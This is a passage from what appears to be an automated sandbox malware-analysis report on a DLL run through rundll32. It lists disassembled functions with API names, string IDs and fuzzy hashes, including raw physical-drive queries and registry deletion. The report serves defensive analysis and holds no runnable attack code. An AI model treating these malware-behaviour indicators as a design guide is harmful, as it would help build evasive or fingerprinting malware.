                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CriticalSection$EnterInitializeLeavefreemallocmemmove
                                                                                                  • String ID:
                                                                                                  • API String ID: 1740668140-0
                                                                                                  • Opcode ID: 22bd5bec54ccc0147c543859d5de4a8772452d611ad636121f4766ad3a15c823
                                                                                                  • Instruction ID: e94a3ea1fea36b0b32ca35adaff13378f84fa0a728ffd439e1abdc7c1a055df0
                                                                                                  • Opcode Fuzzy Hash: 22bd5bec54ccc0147c543859d5de4a8772452d611ad636121f4766ad3a15c823
                                                                                                  • Instruction Fuzzy Hash: 4D316C32605B4886EB828F15EC543D977A5F79CBE4F59C225EAA9077A5CF3CC249C700
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 000000018006B608 Relevance: 6.2, APIs: 4, Instructions: 158COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _swprintf_c_lmemset$memmove
                                                                                                  • String ID:
                                                                                                  • API String ID: 529592607-0
                                                                                                  • Opcode ID: 6bc86c610155bdb5aebda1b2b46f1ef4a468bbe58387529f13665b23f30c6861
                                                                                                  • Instruction ID: ba4715e769750691a3bc0bfe9bd3733961d9e4a3663b4e6e6e4877dc311f9b78
                                                                                                  • Opcode Fuzzy Hash: 6bc86c610155bdb5aebda1b2b46f1ef4a468bbe58387529f13665b23f30c6861
                                                                                                  • Instruction Fuzzy Hash: 5851C072205B8885EBA1CF29E8007D973A5F788BC8F64C126EE5D83794DF38C659C740
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 000000018002CD40 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 142COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _wcsicmp
                                                                                                  • String ID: ScriptEngine$ScriptHostEncode${0CF774D0-F077-11D1-B1BC-00C04F86C324}
                                                                                                  • API String ID: 2081463915-2936173157
                                                                                                  • Opcode ID: 91efc328dbdbb67abd3faf589063878782725af3816d995bc94ee69e6f4a6945
                                                                                                  • Instruction ID: 292b1ab8c79ee979d74f734f58635ebd7dc6439912a4449b937fba72fcba6d7c
                                                                                                  • Opcode Fuzzy Hash: 91efc328dbdbb67abd3faf589063878782725af3816d995bc94ee69e6f4a6945
                                                                                                  • Instruction Fuzzy Hash: 5B514F72711E4986EB419F79C8807CC2760FB49BF4F449322AA3E936E5DF64C989C340
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 000000018006B434 Relevance: 6.1, APIs: 4, Instructions: 132COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _swprintf_c_lmemset$memmove
                                                                                                  • String ID:
                                                                                                  • API String ID: 529592607-0
                                                                                                  • Opcode ID: f944d7871dad8b8b363b67a0dc826b8a901f6cc992fc975bf1c3b91d52d59fb4
                                                                                                  • Instruction ID: 645fb74c30286fe1cf00211cd1a8741acda599680070850ad10f3b39ebb77e1a
                                                                                                  • Opcode Fuzzy Hash: f944d7871dad8b8b363b67a0dc826b8a901f6cc992fc975bf1c3b91d52d59fb4
                                                                                                  • Instruction Fuzzy Hash: 695106B3214B8886E795DF26D8007E977A5F748BD8F64C115EE1A87784DF38C64ACB40
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 000000018003C208 Relevance: 6.1, APIs: 4, Instructions: 130COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CriticalSection$EnterInitializeLeave
                                                                                                  • String ID:
                                                                                                  • API String ID: 3991485460-0
                                                                                                  • Opcode ID: 679129d8c6ac973d941e645a86577fd2f61a9db60b9c7d755c606238edf6303c
                                                                                                  • Instruction ID: ad71276d619936af7ac4a5a15bbb21467ea728ff9fc93a66917b9291cac940fe
                                                                                                  • Opcode Fuzzy Hash: 679129d8c6ac973d941e645a86577fd2f61a9db60b9c7d755c606238edf6303c
                                                                                                  • Instruction Fuzzy Hash: 04514B36201B4886EB96CF21E844B9E33A9FB48BD8F158516EE6947768CF34C658C391
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 000000018007118C Relevance: 6.1, APIs: 4, Instructions: 130COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _errno$freewcstol
                                                                                                  • String ID:
                                                                                                  • API String ID: 1017142431-0
                                                                                                  • Opcode ID: ff5ef48b78630e08533642c69faefc33a22d26cdb222d6ff618587a61c53f66f
                                                                                                  • Instruction ID: d086f90ac81a06e5d512d2f495a144483870d0a007861e51eb34273852a96ff0
                                                                                                  • Opcode Fuzzy Hash: ff5ef48b78630e08533642c69faefc33a22d26cdb222d6ff618587a61c53f66f
                                                                                                  • Instruction Fuzzy Hash: 65516B326047888AEBA68F5AA0403EE73A4F7887D5F108115FF9957BD8CF3AD655CB00
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 000000018004C20C Relevance: 6.1, APIs: 4, Instructions: 128COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: String$??2@Free$??3@Alloc
                                                                                                  • String ID:
                                                                                                  • API String ID: 1832687772-0
                                                                                                  • Opcode ID: ec64ef81cce12dd9496e54433e59b2b444f0d078a8dee198f6ac45ada33b9a8a
                                                                                                  • Instruction ID: 427e473512a75300f47d7fa230ba5ccb5e5a60885440308665830fb44559812f
                                                                                                  • Opcode Fuzzy Hash: ec64ef81cce12dd9496e54433e59b2b444f0d078a8dee198f6ac45ada33b9a8a
                                                                                                  • Instruction Fuzzy Hash: 58513A72711A0885EB91DFA5C8947ED3370FB48FE9F098621EE2A57698DF78C648C344
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00000001800436D8 Relevance: 6.1, APIs: 4, Instructions: 125COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memmove$memset$_time64htonlrandsrand
                                                                                                  • String ID:
                                                                                                  • API String ID: 2420628730-0
                                                                                                  • Opcode ID: bc717a641c4b40965a7539f697593fdcfd2d1c84f3e9c21b72f2d4563acd1e4c
                                                                                                  • Instruction ID: 78dc16aea02112adc5142b529c93f8ef24449392eecf0550c8dd20f0597382ad
                                                                                                  • Opcode Fuzzy Hash: bc717a641c4b40965a7539f697593fdcfd2d1c84f3e9c21b72f2d4563acd1e4c
                                                                                                  • Instruction Fuzzy Hash: C251893BA00B9089E702CF65A8413DD7BB8F309B9CF1A9149EF9517B49CB30C60AC360
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180072146 Relevance: 6.1, APIs: 4, Instructions: 122COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _errno$freewcstol
                                                                                                  • String ID:
                                                                                                  • API String ID: 1017142431-0
                                                                                                  • Opcode ID: 9f264acde1fee37a4af08923b04b71ab41a6f4bc8a876f6580f083589344777c
                                                                                                  • Instruction ID: ea2c5121f7eb01e98f314e31e7cc383447851c7166ff6db358424aa6cc9ed06f
                                                                                                  • Opcode Fuzzy Hash: 9f264acde1fee37a4af08923b04b71ab41a6f4bc8a876f6580f083589344777c
                                                                                                  • Instruction Fuzzy Hash: C351683264478886EBA68F26A1403AE33E5F7597D8F008115FF9907798CF3ADA59CB00
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180071286 Relevance: 6.1, APIs: 4, Instructions: 116COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _errno$freewcstol
                                                                                                  • String ID:
                                                                                                  • API String ID: 1017142431-0
                                                                                                  • Opcode ID: 91753a2b24579f809c59a7839bbf57d4aaec203e4d39ef9f43d9a770c5dee1b2
                                                                                                  • Instruction ID: be79dc67c6c354923b804fe5f8ad9b59a21627c827f8274b8046453acc0eb7fe
                                                                                                  • Opcode Fuzzy Hash: 91753a2b24579f809c59a7839bbf57d4aaec203e4d39ef9f43d9a770c5dee1b2
                                                                                                  • Instruction Fuzzy Hash: 0C4160326047988AEBAA8F1AA0403EE73A5F7887D5F108115FF99477D9CF3AD655CB00
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180072242 Relevance: 6.1, APIs: 4, Instructions: 108COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _errno$freewcstol
                                                                                                  • String ID:
                                                                                                  • API String ID: 1017142431-0
                                                                                                  • Opcode ID: c26116d00bfa255a5e71194d5ccf5fda896b8abf688f47e901cb44eb358fcc84
                                                                                                  • Instruction ID: b35714efefb3a3022de44867f37344a12698415f3c6fa059f944579b3902dd1a
                                                                                                  • Opcode Fuzzy Hash: c26116d00bfa255a5e71194d5ccf5fda896b8abf688f47e901cb44eb358fcc84
                                                                                                  • Instruction Fuzzy Hash: AE415A7264478886EBB68F2594503EE37A1F7597E8F008115FF5807798CF3EDA5A8B00
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 000000018000ADF4 Relevance: 6.1, APIs: 4, Instructions: 91COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ByteCharMultiWide$ErrorLast
                                                                                                  • String ID:
                                                                                                  • API String ID: 1717984340-0
                                                                                                  • Opcode ID: ac5000abb9ee01d321f1ec273ada81a5511227e924beba0eb19fad604af8d780
                                                                                                  • Instruction ID: bae3b3959ef39ef5daeeababb2c60870945ab1ace41e6c98233782fb8fc2ea52
                                                                                                  • Opcode Fuzzy Hash: ac5000abb9ee01d321f1ec273ada81a5511227e924beba0eb19fad604af8d780
                                                                                                  • Instruction Fuzzy Hash: 9B31D272604B8482E764CF56B88074AB7A8F79DBD0F548628AFD947BA5CF38C645C700
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 000000018006C200 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 000000018006A2B8: malloc.MSVCRT(?,?,?,0000000180069638), ref: 000000018006DF0A
                                                                                                    • Part of subcall function 000000018006A2B8: SetLastError.KERNEL32(?,?,?,0000000180069638), ref: 000000018006DF1B
                                                                                                    • Part of subcall function 000000018006A32C: CreateFileA.KERNEL32 ref: 000000018006A363
                                                                                                  • memset.MSVCRT ref: 000000018006C2AB
                                                                                                    • Part of subcall function 000000018006A2C8: DeviceIoControl.KERNEL32 ref: 000000018006A2F1
                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000400,?,00000000,00002000,00000000,000000018006C06D), ref: 000000018006C308
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CloseControlCreateDeviceErrorFileHandleLastmallocmemmovememset
                                                                                                  • String ID: DISKID:$\\.\PhysicalDrive%d
                                                                                                  • API String ID: 1541746987-3765948602
                                                                                                  • Opcode ID: 0a0cd503669e2d71dfc94f1a05760105f70003c8e3e1ab21ca38997401335250
                                                                                                  • Instruction ID: 026b1f04e6263926176f9cf333c98f43658e4a5f02bea82afa83b16206533a48
                                                                                                  • Opcode Fuzzy Hash: 0a0cd503669e2d71dfc94f1a05760105f70003c8e3e1ab21ca38997401335250
                                                                                                  • Instruction Fuzzy Hash: D831063220474542FBA29B66AC00BEA7392F789BD4F608121BE5947795DF3CC749CB40
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 000000018001E200 Relevance: 6.1, APIs: 4, Instructions: 75registryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Delete
                                                                                                  • String ID:
                                                                                                  • API String ID: 1035893169-0
                                                                                                  • Opcode ID: 22d0e1e140aac874fdce29ddc6509984b94616c0dddbf9d09c1d0fd8dd23a40b
                                                                                                  • Instruction ID: 40b5deca117a7cefaab46096add2d716b918ff16b730c8479b301d173d09ace7
                                                                                                  • Opcode Fuzzy Hash: 22d0e1e140aac874fdce29ddc6509984b94616c0dddbf9d09c1d0fd8dd23a40b
                                                                                                  • Instruction Fuzzy Hash: 44219031705E8840FBAADBA2991079D6299BB4EFC0F1DC525FD2A437D4DE38C7488311
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 000000018000136C Relevance: 6.1, APIs: 4, Instructions: 62COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CriticalInitializeSection$CountErrorLastSpinmemset
                                                                                                  • String ID:
                                                                                                  • API String ID: 3637577767-0
                                                                                                  • Opcode ID: 7d90deead172f80c17223e4fafcbbf4c21f3a15fc56382854b34721b20ae6022
                                                                                                  • Instruction ID: ef4c7ed201465567351dd9e07388d3240b1ef5216baed700a57e94c047b35caf
                                                                                                  • Opcode Fuzzy Hash: 7d90deead172f80c17223e4fafcbbf4c21f3a15fc56382854b34721b20ae6022
                                                                                                  • Instruction Fuzzy Hash: 74213D30602B0991EA96DB24AC553D933A0BF8D7A5F508629A66E473B1EE38C75DC321
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00000001800324A4 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: String$??3@Free$??2@AllocFileFindNamePath
                                                                                                  • String ID:
                                                                                                  • API String ID: 772211780-0
                                                                                                  • Opcode ID: 0f2a8a44e8f4c9cff1795b6050ee267adc792dc9736a48368970f0735874c93d
                                                                                                  • Instruction ID: 2d82027f7e94cb9bcb22be17a4537bea80464cdcc919518384ddf93808e552b3
                                                                                                  • Opcode Fuzzy Hash: 0f2a8a44e8f4c9cff1795b6050ee267adc792dc9736a48368970f0735874c93d
                                                                                                  • Instruction Fuzzy Hash: 0521C432611E4482EB529F29D85039EB3A0FB89BF4F198711EA794B6E8DF7CC2448700
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180032A90 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: String$??3@Free$??2@AllocFileFindNamePath
                                                                                                  • String ID:
                                                                                                  • API String ID: 772211780-0
